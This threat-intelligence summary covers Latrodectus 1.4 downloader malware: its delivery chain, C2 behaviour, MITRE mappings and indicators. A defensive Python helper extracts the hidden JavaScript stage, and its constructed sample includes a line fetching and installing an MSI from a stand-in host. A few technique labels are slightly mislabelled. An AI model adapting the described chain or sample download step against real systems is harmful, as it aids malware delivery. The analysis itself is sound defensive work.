Latrodectus is a downloader malware with IcedID-like characteristics that is distributed via targeted email spam by TA577 and TA578. The 1.4 update introduces stronger obfuscation, new commands, and updated C2 behavior, including JavaScript delivery, a rundll32-loaded DLL, and a revamped payload chain. Hashtags: #Latrodectus #IcedID #TA577 #TA578 #DaveCrypter
Keypoints
- Latrodectus is a downloader malware noted for its IcedID-like code and infrastructure.
- First observed by Walmart in October 2023.
- Distributed via email spam campaigns by threat actors TA577 and TA578.
- Version 1.4 adds AES256 string obfuscation, new C2 endpoint, and two new backdoor commands.
- Initial payload is a JavaScript file that downloads an MSI file.
- MSI loads a DLL named “nvidia.dll” via rundll32.exe, with the DLL stored inside a CAB file named “disk1.”
- C2 traffic collects system information, encrypts it, and transmits it to the C2; new variant uses /test endpoint.
MITRE Techniques
- [T1059.007] JavaScript – The infection chain opens with an obfuscated JavaScript file, using the same obfuscation approach seen in earlier Latrodectus campaigns. ‘The first payload of the infection chain is a JavaScript file obfuscated using a similar approach used by other Latrodectus campaigns.’
- [T1105] Ingress Tool Transfer – The malware downloads an MSI file from a remote server and executes/installs it. ‘The malware searches for lines starting with the “/////” string, puts them into a buffer and executes them as a JS function. The executed function then downloads an MSI file from a remote server and executes/installs it.’
- [T1218.011] Rundll32 – The MSI stage launches rundll32.exe to load “nvidia.dll” and invoke its exported “AnselEnableCheck” function. ‘The MSI file uses the rundll32.exe Windows tool to load a DLL named “nvidia.dll” and calls a function named “AnselEnableCheck” exported by this DLL.’
- [T1027] Obfuscated/Compressed Files and Information – The crypter named Dave obfuscates the main payload; the crypter stores the payload in a resource or a section. ‘The crypter stores the payload to be executed either in a resource or in a section.’ ‘String obfuscation uses AES256 in CTR mode.’
- [T1071.001] Web Protocols – Initial C2 uses HTTP POST to communicate data; ‘The information is sent in the HTTP body via an HTTP POST request. The endpoint used in the new variants is “/test” instead of “/live”.’
- [T1041] Exfiltration Over C2 Channel – System information is encrypted with RC4 and base64 before transmission. ‘The information is formatted… encrypted using the RC4 algorithm, encoded using base64 and sent to the C2.’
- [T1060] Registry Run Keys / Startup Folder – Persistence mechanism referenced in the attack framework. ‘Persistence: Registry Run Keys / Startup Folder (T1060)’.
- [T1003] Credential Dumping – Credential access technique listed in the article. ‘Credential Dumping (T1003)’.
- [T1055] Shellcode – Command 0x16 downloads a shellcode and executes it in a new thread. ‘Command 0x16: In this command the malware downloads a shellcode from the specified server and executes it via a new thread.’
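The T1105 item above describes how the JavaScript stage hides its real code in lines beginning with “/////”, gathers them into a buffer and evaluates the result. The following analyst helper is an added example (not code from the article or from Netskope) that performs only the gathering step statically, so the hidden stage can be read and triaged without executing anything; the sample script, the `hxxp://example.invalid` URL and the whitespace tolerance are constructed assumptions.

```python
# Static helper for the Latrodectus JavaScript stage described above: the
# dropper keeps its real code in lines starting with "/////", collects them
# into a buffer and evaluates them. This does only the collection step, so
# the hidden stage can be read without running it. Sample input is constructed.
import re

MARKER = "/////"

# Constructed sample (not a real dropper): filler lines around marker lines.
SAMPLE_JS = """\
// Copyright (c) Example Corp. All rights reserved.
var a = 1;
///// function run() {
// lorem ipsum dolor sit amet
///// var u = "hxxp://example.invalid/installer.msi";
var b = a + 1;
///// fetchAndInstall(u);
///// }
// end of file
"""


def extract_marker_lines(js_text: str, marker: str = MARKER) -> list[str]:
    """Return the fragments hidden behind `marker`, in file order.
    Leading whitespace is tolerated here as a defensive assumption."""
    fragments = []
    for line in js_text.splitlines():
        stripped = line.lstrip()
        if stripped.startswith(marker):
            fragments.append(stripped[len(marker):].strip())
    return fragments


def reassemble_hidden_stage(js_text: str, marker: str = MARKER) -> str:
    """Join the fragments into the script the dropper would have evaluated."""
    return "\n".join(extract_marker_lines(js_text, marker))


def triage(js_text: str, marker: str = MARKER, min_lines: int = 3) -> dict:
    """Flag files that carry a non-trivial hidden stage and say whether it
    names an .msi (the download the article attributes to this stage)."""
    fragments = extract_marker_lines(js_text, marker)
    hidden = "\n".join(fragments)
    return {
        "hidden_line_count": len(fragments),
        "suspicious": len(fragments) >= min_lines,
        "references_msi": bool(re.search(r"\.msi\b", hidden, re.IGNORECASE)),
    }
```

Run `triage(open(path).read())` over a quarantined .js attachment to get the hidden line count and an MSI-reference flag; `reassemble_hidden_stage` returns the recovered second stage as text for manual review.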
Indicators of Compromise
- [File] nvidia.dll – loaded by rundll32 during MSI execution to run the final payload. nvidia.dll is the critical DLL used in the infection chain.
- [File] disk1 – CAB file inside the MSI that stores the malicious payload. disk1 contains the DLL used by the loader.
- [URL] /test – C2 HTTP endpoint used by the latest variant for data exfiltration. ‘The endpoint used in the new variants is “/test” …’
- [Signature] Netskope Threat Protection detections – Gen:Variant.Ulise.493872, Trojan.Generic.36724146; and Win64.Trojan.ShellCoExec as proactive coverage indicators.
Read more: https://www.netskope.com/blog/latrodectus-rapid-evolution-continues-with-latest-new-payload-features